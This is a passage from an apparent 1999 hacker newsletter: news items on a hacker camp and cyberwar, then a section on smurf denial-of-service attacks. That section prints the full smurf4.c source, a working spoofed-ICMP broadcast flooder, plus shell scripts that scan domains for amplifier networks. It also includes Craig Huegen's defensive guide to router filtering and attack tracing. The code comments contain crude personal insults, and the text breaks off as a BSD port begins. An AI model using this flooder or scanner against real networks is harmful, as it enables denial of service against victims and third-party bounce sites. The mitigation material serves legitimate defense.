"It's a way to attach faces to email addresses," said John Gilmore, one of the founders of the San Francisco-based Cypherpunks. "It's a way to say,
'Hey, I know this person, we've been collaborating for years. Who are you?'"
Like others at the event, Gilmore was headed in about four directions at once. That's how it goes when you put together thousands of smart,
passionate people used to the isolated pursuit of their craft.
Mass hacking, under the stars no less, was one of the activities. It took on an unlikely charm, especially given its location -- in the main tent next
to a small, polished-silver spacecraft, a "shuttle" to Chaos' Heart of Gold Web site.
This weekend's three-day event, the first of its kind in Germany, takes as its inspiration Hacking in Progress, a similarly organized hacking and
technology festival that took place outside of Amsterdam two summers ago.
"About 10 Cypherpunks went to HIP two years ago, and they came back with so many stories about how fun it was hanging out with people there.
Also, they finished proofreading and typing in PGP, Pretty Good Privacy, a computer program that does encryption, so there was an international
version," said Gilmore.
"I didn't make it to HIP, but I resolved to go to the next one, and here I am. We have 15 or 20 people here, probably more than a dozen from the
San Francisco Bay Area, and others scattered around from Berlin and Amsterdam and other parts of Europe. It's a real collegial, friendly sort of
atmosphere. I'm meeting a lot of great people."
The Berlin-based Chaos Computer Club, which organized the weekend, spent a year preparing for the meeting. That comes through in the
atmosphere of crisp organization that seems to meld seamlessly with a spirit of fun -- the latter best summed up by comments like, "What's it like?
I've never done pot before."
"For me, this is more German than HIP," said Ine Poppe, a Dutch documentary filmmaker and artist who worked HIP as a journalist. "It's better
organized. They learned a lot from the festivals before.
"From my point of view, HIP had more of a scene of chaos: tents close together and cables all over the place and dance parties into the night.
Maybe we will have those later."
Kurt Seifried, a 22-year-old from Edmonton, Alberta, was roaming around the Cypherpunk tent with the exultant air of a student wrapping up finals
week.
"I gave a talk during one of the workshops and they didn't throw beer cans at me, so I guess it went all right," he said. "It was my first public
speaking experience, so it was kind of scary.
"The worst part was, they canceled the other workshop scheduled for the same time, so I looked up and about 100 people were streaming into the
tent wanting to be entertained. It was like something out of Pink Floyd's The Wall."
Seifried's area of expertise is security, the yin to cracking's yang. His 177-page guide to Linux security is posted on the Web.
"It's encryption at network level to secure things, because right now the Internet is wide open, as people know. I came here to do that, and to
network a little," he said.
Yet after the hacking and networking comes the relaxing, and the face-to-face conversations.
@HWA
55.0 Hackers and Cyberwar "The Threat of Chaos "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hacker Sitings and News
8/7/99
Cyberwar: The Threat of Chaos
Hackers can
disrupt, but can
they make war?
Hackers and other
cyber-vandals have become
a major threat as the world's
powers rely increasingly on
their computers.
By Bob Sullivan
MSNBC
�WE HAVE NOTHING to fear but fear itself,� offered
Franklin Roosevelt during the throes of the Great
Depression. He might also have been talking about the
Information Age, where the power of personal computers
seems to offer limitless possibilities for both creativity and
destruction.
Not true, the experts say � there are limits to the
damage that can be done with zeros and ones.
Experts like those at Bell Laboratories in New Jersey
insist that image of a pimply-faced geek gaining control of
Defense Department computers is pure science fiction. Even
an organized �hack� by well-funded terrorist organizations
who take control of a nuclear missile facility is fanciful, they
say � and hardly worth the trouble. Not when it would be
so much easier to create equal havoc using much simpler
methods.
THINKING SMALL
�We are the most technologically advanced country
in the world, which means we have the most to lose.�
� FRANK CILLUFFO
Information warfare
specialist
Imagine, for example, if the Internet suddenly stopped
working. A hacker group told Congress it could be done in
half an hour. Or if power to major cities were disrupted.
Government-hired hackers did that in four days in 1997. Or
if parts of the 911 system were cut off. A Swedish hacker
now in an asylum managed briefly to cut off 911 service in
Florida two years ago.
Such �nuisance� hacks on infrastructure are less
dramatic than the hijacking of a missile, but they might be
more effective.
�The psychological impacts of IW (information
warfare) can�t be overstated,� said Frank Cilluffo, director
of the Information Warfare Task Force at the Center for
Strategic and International Studies. �Using it, terrorist
groups can achieve what they cannot militarily.
�We are the most technologically advanced country in
the world, which means we have the most to lose,� he
added. �The United States is not very prepared to lose
power, for example. And how long can you live without that
database? What if suddenly all e-commerce were cut off?�
TARGETING FINANCE
Throw banking into that e-commerce category. During
the Kosovo conflict, numerous reports suggested U.S.
intelligence agencies had hired hackers to tinker with
international bank accounts full of Yugoslav President
Slobodan Milosevic�s money. There was plenty of debate in
the security community about how possible this might be,
but even the idea sent shudders through the financial
industry. Once that Pandora�s box is open � once one
government�s hackers are capable of freezing or altering
personal bank account information � other governments
and terrorist organizations surely would follow suit. And
since the entire banking system is based on confidence, such
an attack could completely undermine the integrity of the
banking system, according to Kawika Daguio, executive
vice president of the Financial Information Protection
Association.
THE MULTIPLIER EFFECT
Cilluffo�s biggest concern is not an all-digital attack, but
the use of computers as a multiplier for a more traditional
attack. Imagine if a hacker had disabled 911 during the
Oklahoma City bombing in 1995. Not only would medical
help have been severely delayed, leading to more death and
destruction � the resulting confusion would at least be
demoralizing and, at worst, create a panic.
For proof of the potential for mob psychology, experts
point to the Y2K bug. Even with several years� warning and
continuous announcements that computers are
Y2K-compliant, banks report cash hoarding has already
begun, and survivalist-minded individuals are squirreling
away water and dry goods.
�The actual problem is usually 10 times less damaging
than the public perception of it,� said Space Rogue, who
runs the Hacker News Network service.
The threat: real or not?
There�s plenty of debate about how severe the
cyberthreat is, though recent signals from the U.S.
government suggest federal agencies are taking it very
seriously.
Just last week, The New York Times was leaked a
document showing the National Security Council is working
on a Big Brother-like electronic monitoring system called
the �Federal Intrusion Detection Network.�
The plan�s director told the Times: �We know� foreign
governments are developing cyberwar capabilities, and �we
have good reason to believe that terrorists may be
developing similar capabilities.�
ELIGIBLE RECEIVER
The National Security Agency�s 1997 cyberwar �fire
drill� may have inspired the study. In a military exercise
code-named �Eligible Receiver,� 35 hackers hired by the
NSA gained access to 36 of the 40,000 government
networks within four days. They were able to gain control
of major power grids and could have disrupted power in
Los Angeles, Chicago, Washington and New York.
But nothing nearly so sophisticated is required. In
testimony to Congress last year, members of the hacker
group L0pht said they could bring the Internet to its knees in
less than an hour.
�It is not difficult at all to fool, confuse or corrupt major
[domain name] servers,� Dr. Mudge, who testified to
Congress, told MSNBC. �There are many more interesting
attacks that could be much more devastating, dealing with
disrupting routing between major tier-one service providers
(that is, stopping MCI from being able to talk to Sprintnet,
etc.) and is completely feasible, doable with very little
effort.�
And the number of technologies that might be turned
against the United States continues to expand with each
high-tech invention, say several scientists at U.S. high-tech
labs. Among the most frightening are the advent of MEMS
� micro-electro-mechanical systems. These tiny machines,
potentially smaller than a human cell, may one day be
injected into the bloodstream as miniature doctors sent to
beat back viruses or kill cancerous cells. But they could just
as easily be designed as a lethal combination of high-tech
and biological warfare, as smart MEMS could be set to
infect and kill specific kinds of subjects.
Irrational fears?
Not everyone is persuaded the threat is all that
dramatic. After all, hackers did not gain access to the
Pentagon�s most secure systems. InfoWar.com founder
Louis Cipher (a pseudonym) says Eligible Receiver and
other high-profile cyber-threat incidents are part publicity
stunt aimed at getting more federal money targeted to
cyberwarfare research.
�Paranoia is a bad thing, and America is being infected
quickly,� Cipher said. �Everybody�s an alarmist.... You can
disturb an infrastructure. Can go into telephony and can
cause disturbance, a denial of service. But disturbing
electrical facilities is difficult. Just like on a railroad, they can
go from track to track. There are a lot of safeguards.�
And despite all the conjecture about cyberwar
capabilities, there�s little evidence it has actually been used.
In fact, even if the ability to take out power grids with a
computer is out there, U.S. forces apparently showed a
distinct reluctance to use the ability during the Kosovo
conflict. So-called �soft bombs,� which short out electric
lines, were used to create local power disruptions instead of
a computer-based attack.
That satisfies Cilluffo, who thinks the United States
should hold off crossing the line to cyberwar for as long as
possible.
�A well-placed bomb may still be easier,� Cilluffo said.
�If we can go through physical means, then we are not
compromising a technique that could be used against us....
After all, we have a lot more to lose.�
Bob Sullivan covers Internet issues for MSNBC.com
@HWA
56.0 LOCKDOWN 2000
~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Saturday 7th August 1999 on 4:50 pm CET
New version of Lockdown 2000 has been released - Lockdown 2000 3.0.1.31. In this
version some bugs are repaired (this build fixes all error messages that some
Windows 95/98 users had on close and shutdown, fixes the manual scanner bug and
many more new trojan signatures are added - the current number of trojan versions
which it detects is 301). More information on the website (www.lockdown2000.com).
@HWA
57.0 The SMURF attack and smurf amplifiers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contrary to popular belief SMURF attacks are still very much in use and a threat to ISPs as well as users
alike. The reason for this is that no matter how much you yell certain badly maintained networks STILL
continue to act as SMURF AMPLIFIERS. A plain smurf basically ellicits a ping response from several hundred
machines with a spoofed address and a target return address, a SMURF AMPLIFIER responds more than once to
the ping, in some cases several (as many as 10 or more ) times. These nets are targetted by the smurfer
for their use against the target site... heres a brief description of smurfs and a list of networks that
are acting as smurf amplifiers as of this writing with urls on where to go to find current stats. - Ed
SMURF.C by TFreak
Well, I suppose its `safe' to release this, it seems everyone and their dog has
it and apparantly (and to my surprise) it still works.
The `smurf' attack is quite simple. It has a list of broadcast addresses which
it stores into an array, and sends a spoofed icmp echo request to each of those
addresses in series and starts again. The result is a devistating attack upon
the spoofed ip with, depending on the amount of broadcast addresses used,
many, many computers responding to the echo request.
Before I continue may I first say that this code was a mistake. When it was
written I was not aware of the fact that a) the world would get its hands on it
and b) it would have such a destructive effect on the computers being used to
flood. My ignorance is my mistake. I extremely regret writing this, but as
you well know, if things aren't `exploited' then they aren't fixed.
Now that that's cleared up, how do you protect your network? Well,
unfortunatly I am not sure how or even if it is possible to protect yourself
from being hit with it, unless you wanted to deny all incoming icmp traffic at
the router which isn't the best solution as it renders other useful oddities
(such as ping and traceroute) unusable. To prevent your network from being
used to flood (using up almost all your bandwith therefore creating a denial
of service upon yourself.. technically) is quite easy and not a great loss to
your network. If you filter all incoming icmp traffic to the broadcast address
at the router none of the machines will respond therefore the attack will not
work. This can be done with one line in the router, and I believe a rep from
texas.net posted the solution for this (perhaps it could be reposted?).
I believe MCI is currently working on a patch or dectector of some kind for it,
which is available at
http://www.internetnews.com/isp-news/1997/10/0901-mci.html
Please, patch your networks, if there's nothing to flood with then there's no
flood.
Respectfully,
TFreak
--- 8< smurf4.c >8 ---
/*
*
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
*
* spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
*
* mad head to:
* nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig,
* MissSatan for swallowing, napster for pimping my sister, the guy that
* invented vaseline, fyber for trying, knowy, old school #havok, kain
* cos he rox my sox, zuez, toxik, robocod, and everyone else that i might
* have missed (you know who you are).
*
* hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy
* thing he is (he's -almost- as stubborn as me, still i managed to pick up
* half the cheque).
*
* and a special hi to Todd, face it dude, you're fucking awesome.
*
* mad anal to:
* #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps
* because they plain suck, Rolex for being a twit, everyone that
* trades warez, Caren for being a lesbian hoe, AcidKill for being her
* partner, #cha0s, sedriss for having an ego in inverse proportion to
* his penis and anyone that can't pee standing up -- you don't know what
* your missing out on.
*
* and anyone thats ripped my code (diff smurf.c axcast.c is rather
* interesting).
*
* and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill
* Robbins for trying to steal my girlfriend. Not only did you show me
* no respect but you're a manipulating prick who tried to take away the
* most important thing in the world to me with no guilt whatsoever, and
* for that I wish you nothing but pain. Die.
*
* disclaimer:
* I cannot and will not be held responsible nor legally bound for the
* malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please Don't abuse this.
*
* Well, i really, really, hate this code, but yet here I am creating another
* disgusting version of it. Odd, indeed. So why did I write it? Well, I,
* like most programmers don't like seeing bugs in their code. I saw a few
* things that should have been done better or needed fixing so I fixed
* them. -shrug-, programming for me as always seemed to take the pain away
* ...
*
*
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);
/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
char buf[32], **bcastaddr = malloc(8192);
banner();
signal(SIGINT, ctrlc);
if (argc < 6) usage(argv[0]);
if ((he = gethostbyname(argv[1])) == NULL) {
perror("resolving source host");
exit(-1);
}
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);
if ((bcastfile = fopen(argv[2], "r")) == NULL) {
perror("opening bcast file");
exit(-1);
}
x = 0;
while (!feof(bcastfile)) {
fgets(buf, 32, bcastfile);
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
bcastaddr[x] = malloc(32);
strcpy(bcastaddr[x], buf);
x++;
}
bcastaddr[x] = 0x0;
fclose(bcastfile);
if (x == 0) {
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
exit(-1);
}
if (pktsize > 1024) {
fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
exit(-1);
}
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("getting socket");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
for (i = 0; i < num || !num; i++) {
if (!(i % 25)) { printf("."); fflush(stdout); }
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
cycle++;
if (bcastaddr[cycle] == 0x0) cycle = 0;
usleep(delay);
}
puts("\n\n");
return 0;
}
void banner (void)
{
puts("\nsmurf.c v4.0 by TFreak\n");
}
void usage (char *prog)
{
fprintf(stderr, "usage: %s <target> <bcast file> "
"<num packets> <packet delay> <packet size>\n\n"
"target = address to hit\n"
"bcast file = file to read broadcast addresses from\n"
"num packets = number of packets to send (0 = flood)\n"
"packet delay = wait between each packet (in ms)\n"
"packet size = size of packet (< 1024)\n\n", prog);
exit(-1);
}
void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct iphdr *ip;
struct icmphdr *icmp;
char *packet;
packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->ihl = 5;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = dest;
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);
sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
free(packet); /* free willy! */
}
void ctrlc (int ignored)
{
puts("\nDone!\n");
exit(1);
}
unsigned short in_chksum (u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
--------------------------------------------------------------------------------
Along these same lines, Craig Huegen has written up some documentation that
gives an in depth explination of smurfing and prevention measures at
http://www.quadrunner.com/~c-huegen/smurf.txt
From the web page:
---------------------------------------------------
THE LATEST IN DENIAL OF SERVICE ATTACKS: "SMURFING"
DESCRIPTION AND INFORMATION TO MINIMIZE EFFECTS
Craig A. Huegen
chuegen@quadrunner.com
Last Update: Fri Oct 10 12:20 PDT
New additions:
* More minor corrections
* Added MCI's DoSTracker program (announced at N+I 10/9/97)
* Changed "helpers" to "bounce sites" (kcooper@bbnplanet.com)
* Added preliminary information about Bay Networks routers
(jcgreen@netins.net)
* Added further information about Proteon/OpenROUTE routers
(dts@senie.com)
Editor's plea: *please* distribute this information freely, and abide by
my redistribution requirements (see the very end) when doing so. It's
important that these attacks be minimized, and communication is the only
way to help with this.
OVERVIEW:
The information here provides in-depth information regarding "smurf"
attacks, with a focus on Cisco routers and how to reduce the effects of
the attack. Some information is general and not related to an
organization's particular vendor of choice; however, it is written with a
Cisco router focus. No confirmation has been made to the effects on other
vendors' equipment; however, others have provided me with information for
various vendors, which is provided in the document. See the
"Acknowledgements" section below for the sources and contact information.
I am happy to accept information from other colleagues who are willing to
provide information about other vendors' products in relation to this
topic.
This paper is always being updated as I receive more information about
attacks and work with ways to minimize impact.
DESCRIPTION:
The "smurf" attack, named after its exploit program, is the most recent in
the category of network-level attacks against hosts. A perpetrator sends
a large amount of ICMP echo (ping) traffic at broadcast addresses, all of
it having a spoofed source address of a victim. If the routing device
delivering traffic to those broadcast addresses performs the IP broadcast
to layer 2 broadcast function noted below, most hosts on that IP network
will take the ICMP echo request and reply to it with an echo reply each,
multiplying the traffic by the number of hosts responding. On a
multi-access broadcast network, there could potentially be hundreds of
machines to reply to each packet.
Currently, the providers/machines most commonly hit are IRC servers and
their providers.
There are two parties who are hurt by this attack... the intermediary
(broadcast) devices--let's call them "bounce sites", and the spoofed address
target, or the "victim". The victim is the target of a large amount of
traffic that the bounce sites generate.
Let's look at the scenario to paint a picture of the dangerous nature of
this attack. Assume a co-location switched network with 100 hosts, and
that the attacker has a T1. The attacker sends, say, a 768kb/s stream of
ICMP echo (ping) packets, with a spoofed source address of the victim, to
the broadcast address of the "bounce site". These ping packets hit the
bounce site's broadcast network of 100 hosts; each of them takes the packet
and responds to it, creating 100 ping replies outbound. If you multiply
the bandwidth, you'll see that 76.8 Mbps is used outbound from the "bounce
site" after the traffic is multiplied. This is then sent to the victim (the
spoofed source of the originating packets).
HOW TO KEEP YOUR SITE FROM BEING THE SOURCE
PERPETRATORS USE TO ATTACK VICTIMS:
The perpetrators of these attacks rely on the ability to source spoofed
packets to the "bounce sites" in order to generate the traffic which causes
the denial of service.
In order to stop this, all networks should perform filtering either at the
edge of the network where customers connect (access layer) or at the edge
of the network with connections to the upstream providers.
Paul Ferguson of cisco Systems and Daniel Senie of Daniel Senie consulting
have written an Internet-draft pertaining to this topic. See:
ftp://ftp.internic.net/internet-drafts/draft-ferguson-ingress-filtering-02.txt
for more information on this subject. The authors expect to have it
published as an Informational RFC prior to the December IETF meeting.
HOW TO STOP BEING AN INTERMEDIARY:
This attack relies on the router serving a large multi-access broadcast
network to frame an IP broadcast address (such as 10.255.255.255) into a
layer 2 broadcast frame (for Ethernet, FF:FF:FF:FF:FF:FF). The RFC for
routing states that a router MAY perform this translation for directed
broadcasts. Because in a few select cases it is desirable, and it hasn't
been proved undesirable (except in the recent DoS attacks), most vendors
have chosen to implement this behavior. Generally, with IP providers and
the Internet as we know it today, this behavior should not be needed.
(Editor's note: I welcome other examples where this is needed in today's
networking--see below for a single example I know of.)
Ethernet NIC hardware (MAC-layer hardware, specifically) will only listen
to a select number of addresses in normal operation. The one MAC address
that all devices share in common in normal operation is the media
broadcast, or FF:FF:FF:FF:FF:FF. In this case, a device will take the
packet and send an interrupt for processing.
Because most host IP stacks pay little attention to the destination
address in the IP header of an ICMP packet, or (if they check the IP
header for ICMP) implement responding to ICMP broadcasts, the packet is
handed to the ICMP layer, where in the case of smurf attacks, an ICMP echo
reply is prepared and shipped out to the spoofed address source of the
packet-- the victim.
To stop your Cisco router from converting these layer 3 broadcasts into
layer 2 broadcasts, use the "no ip directed-broadcast" interface
configuration command. This should be configured on all routers which
provide routing to large multi-access broadcast networks (generally LANs),
with more than 5-10 devices. It is unnecessary on point-to-point
interfaces, such as POS, serial T1, HSSI, etc., because point-to-point
interfaces will only generate two replies--one for each end of the link.
No testing has been done on multipoint frame-relay; routers on NBMA
networks typically do not forward broadcasts unless explicitly configured
to do so. Point-to-point sub-interface models will behave like many
point-to-point links--again, this command will have little effect,
stopping only one of the two replies.
Other vendor information:
* Proteon/OpenROUTE:
Daniel Senie (dts@senie.com) reports that Proteon/OpenROUTE Networks
routers have an option to turn off directed broadcasts in the IP
Configuration menus. The command sequence to turn them off is:
*CONFIG (on newer routers) or TALK 6 (on older routers)
Config>PROTOCOL IP
IP Config>DISABLE DIRECTED-BROADCAST
A restart of the router is then required.
* Bay Networks:
Jon Green (jcgreen@netins.net) reports that under current code, there
is no way to keep Bay Networks routers from converting layer 3
broadcasts to layer 2 broadcasts short of applying a per-interface
filter, eliminating packets to the broadcast. However, there is a
feature request to add a configuration option, and it is expected
to be in BayRS version 12.0.
There is one case study where this will stop intended behavior: In the
case where samba (an SMB server for UNIX) or NT is used to "remote
broadcast" into a LAN workgroup so that the workstations on that LAN can
see the server, this will prevent the LAN machines from seeing the remote
server. This is *only* in the case where there is no WINS server (WINS is
routed unicast) and a "remote broadcast" is being used--it's a rare but
notable condition.
INFORMATION FOR VICTIMS AND HOW TO SUPPRESS ATTACKS:
The amount of bandwidth and packets per second (pps) that can be generated
by this attack is quite large. With a 200-host LAN, I was able to
generate over 80 Mbits/sec traffic at around 35 Kpps toward my target--a
pretty significant amount. The victims receive this because traffic is
multiplied by the number of hosts on the broadcast network used (in this
case, with a 200-host network, I was only required to send 400 Kbits/sec
to the broadcast address--less than one-third of a T1).
Many hosts cannot process this many packets per second; many hosts are
connected to 10 Mbit/sec Ethernet LANs where more traffic than wire speed
is sent. Therefore, the ability to drop these packets at the network
border, or even before it flows down the ingress pipes, is desired.
(This next section assumes IOS behavior with standard central switching--
FIB/CEF isn't covered here, the behavior is different, I believe.)
Cisco routers have several "paths" which packets can take to be routed;
each has a varying degree of overhead. The slowest of these is "process"
switching. This is used when a complex task is required for processing
packets. The other modes are variations of a fast path--each of them with
a set of advantages and disadvantages. However, they're all handled at
interrupt level (no process-level time is required to push these packets).
In IOS versions (even the most recent), access-list denies are handled at
the process (slow) level, because they require an ICMP unreachable to be
generated to the originating host. All packets were sent to the process
level automatically to be handled this way.
Under a recent code change (Cisco bug ID CSCdj35407--integrated in version
11.1(14)CA and later), packets denied by an access-list will be dropped at
the interrupt (fast) level, with the exception of 2 packets per second per
access-list deny line. These 2 packets per second will be used to send the
"ICMP unreachable via administrative block" messages. This assumes that
you don't want to log the access-list violations (via the "log" or
"log-input" keywords). The ability to rate-limit "log-input" access-list
lines (in order to more easily log these packets) is currently being
integrated; see the section below on tracing spoofed packet attacks for
information on logging.
Filtering ICMP echo reply packets destined for your high-profile machines
at the ingress interfaces of the network border routers will then permit
the packets to be dropped at the earliest possible point. However, it
does not mean that the network access pipes won't fill, as the packets
will still come down the pipe to be dropped at the router. It will,
however, take the load off the system being attacked. Keep in mind that
this also denies others from being able to ping from that machine (the
replies will never reach the machine).
For those customers of providers who use Cisco, this may give you some
leverage with the providers' security teams to help save your pipes by
filtering before the traffic is sent to you.
Efforts are underway to integrate these fixes in the other major versions
and branches as well.
TRACING SPOOFED PACKET STREAMS:
Tracking these attacks can prove to be difficult, but is possible with
coordination and cooperation from providers. This section also assumes
Cisco routers, because I can speak only about the abilities of Cisco to
log/filter packets and what impact it may have.
Today, logging packets which pass through or get dropped in an ACL is
possible; however, all packets with the "log" or "log-input" ACL options
are sent to process level for logging. For a large stream of packets,
this could cause excessive CPU problems. For this reason, tracking
attacks via IOS logging today is limited to either lower bandwidth attacks
(smaller than 10k packets per second). Even then, the number of log
messages generated by the router could overload a syslog server.
Cisco bug ID CSCdj35856 addresses this problem. It has been integrated
into IOS version 11.1CA releases beginning with 11.1(14.1)CA (a
maintenance interim release), and makes it possible to log packets at
defined intervals and to process logged packets not at that interval in
the fast path. I will update this page with version numbers as the
releases are integrated.
Some information on logging:
In later 11.1 versions, a new keyword was introduced for ACL logging:
"log-input". A formatted ACL line utilizing the keyword looks like this:
access-list 101 permit icmp any any echo log-input
When applied to an interface, this line will log all ICMP ping packets
with input interface and MAC address (for multi-access networks).
Point-to-point interfaces will not have a MAC address listed.
Here's an example of the log entry for a multi-access network (FDDI, Ether):
Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets
Here's an example of the log entry for a point-to-point network:
Sep 10 23:29:00 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
10.0.7.30 (BRI0 *PPP*) -> 10.0.19.242 (8/0), 1 packet
Substituting "log" for "log-input" will eliminate the incoming interface
and MAC address from the log messages.
We'll use the first log entry to demonstrate how to go from here. This
log entry means the packet came in on FastEthernet1/0, from MAC address
0060.3e2f.6e41, destined for 10.30.248.3. From here, you can use "show ip
arp" (if needed) to determine the IP address for the MAC address, and go
to the next hop for tracing or contact the necessary peer (in the case of
an exchange point). This is a hop-by-hop tracing method.
Example of "show ip arp" used to find next hop:
netlab#show ip arp 0060.3e2f.6e41
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.0.183.65 32 0060.3e2f.6e41 ARPA FastEthernet1/0
As you can see, 10.0.183.65 is the next hop where the packets came from
and we should go there to continue the tracing process, utilizing the same
ACL method. By doing this, you can track the spoof attack backwards.
While this is general information on tracking spoofed packets, it must be
noted that the victims of a smurf attack get packets from the listed source
in the packets; i.e., they receive echo-reply packets truly from the source
listed in the IP header. This information should be used by the bounce sites
or intermediaries to track the spoofed echo _request_ packets back to
their source (the perpetrator).
MCI's Internet Security team has put together a perl script which, in an
automated fashion, can log into your Cisco routers and trace a spoof attack
back to its source. The program is available, free of charge. See
http://www.security.mci.net/dostracker/ for more information.
OTHER DENIAL OF SERVICE ATTACKS WORTHY OF MENTION:
Two other denial of service attacks frequently encountered are TCP SYN
floods, and UDP floods aimed at diagnostic ports on hosts.
TCP SYN attacks consist of a large number of spoofed TCP connection set-up
messages aimed at a particular service on a host. Older TCP
implementations cannot handle many faked connection set-up packets, and
will not allow access to the victim service.
The most common form of UDP flooding directed at harming networks is an
attack consisting of a large number of spoofed UDP packets aimed at
diagnostic ports on network devices. This attack is also known as the
"pepsi" attack (again named after the exploit program), and can cause
network devices to use up a large amount of CPU time responding to these
packets.
To get more information on minimizing the effects of these two attacks,
see:
Defining Strategies to Protect Against TCP SYN
Denial of Service Attacks
http://cio.cisco.com/warp/public/707/4.html
Defining Strategies to Protect Against UDP Diagnostic
Port DoS Attacks
http://cio.cisco.com/warp/public/707/3.html
PERFORMANCE INFORMATION:
One ISP has reported that, spread across three routers (2 RSP2 and 1
RSP4), the fast drop code eliminated a sustained 120 Mbits/sec smurf
attack and kept the network running without performance problems.
As always, your mileage may vary.
ACKNOWLEDGEMENTS:
Thanks to all those who helped review and provide input to the paper, as
well as sanity checking.
Specific thanks to:
* Ravi Chandra of Cisco Systems for information on the bugfixes.
* Daniel Senie of Daniel Senie Consulting, Jon Green of Bay Networks for
information on other vendors' equipment.
* Paul Ferguson of Cisco Systems, Kelly Cooper of GTE/BBN, Rob McMillan of
CERT for sanity-check and review comments.
Referenced documents:
This section is coming soon. =)
PERMISSION TO DUPLICATE:
Permission to duplicate this information is granted under these terms:
1. My name and e-mail address remains on the information as a target for
questions and identification of the source
2. My disclaimer appears on the information at the bottom
3. Feel free to add extra information from other discussions, etc., but
please ensure the correct attribution is made to the author. Also
provide Craig Huegen (chuegen@quadrunner.com) a copy of your additions.
4. Please help disseminate this information to other network
administrators who are affected by these attacks.
If you have questions, I will be happy to answer them to the best of my
knowledge.
MY DISCLAIMER:
I'm speaking about this as an interested party only. All text in this
paper was written by me; I speak/write for no one but myself. No vendors
have officially confirmed/denied any of the information contained herein.
All research for this paper is being done purely as a matter of
self-interest and desire to help others minimize effects of this attack.
Craig A. Huegen
chuegen@quadrunner.com
http://www.quadrunner.com/~chuegen/smurf.txt
----------------------------------------------------------------------------
T. Freak's posted his smurf code, and there's been a few messages
concerning this d.o.s. attack -- I guess now is a good of a time as any to
release this little script.
I'm sure there's a more efficient way of putting something like this
together, but... oh well. Results of the scan are reported into
./bips.results
note: this script has two parts.
--- bips.sh ---
#!/bin/bash
# find broadcast ip's that reply with 30+ dupes.
# i decided to make this script into two sections. when running this make
# sure both parts are in the same directory.
if [ $# != 1 ]; then
echo "$0 <domain - ie: college.edu>"
else
host -l $1 | grep 'has address' | cut -d' ' -f4 > $1.ips
cat $1.ips | cut -d'.' -f1-3 | sort |\
awk '{ print echo ""$1".255" }' > $1.tmp
cat $1.tmp | uniq | awk '{ print "./chekdup.sh "$1"" }' > $1.ping
rm -f $1.ips $1.tmp
chmod 700 $1.ping
./$1.ping
rm $1.ping
fi
--- chekdup.sh ---
#!/bin/bash
# this checks possible broadcast ip's for a given amount of icmp echo
# replies.
ping -c 2 $1 > $1.out
if
cat $1.out | grep dupl > /dev/null
then
export DUPES="`cat $1.out | grep dupl | cut -d'+' -f2 | cut -d' ' -f1`"
else
export DUPES=1
fi
if [ $DUPES -gt 30 ]; then
echo "$1 had $DUPES dupes" >> bips.results
rm -f $1.out
else
rm -f $1.out
fi
------------------------------------------------------------------------------
Here is Tfreaks code ported to FreeBSD and whatever other
operating systems use BSD style sockets.
---- smurf.c ----
/*
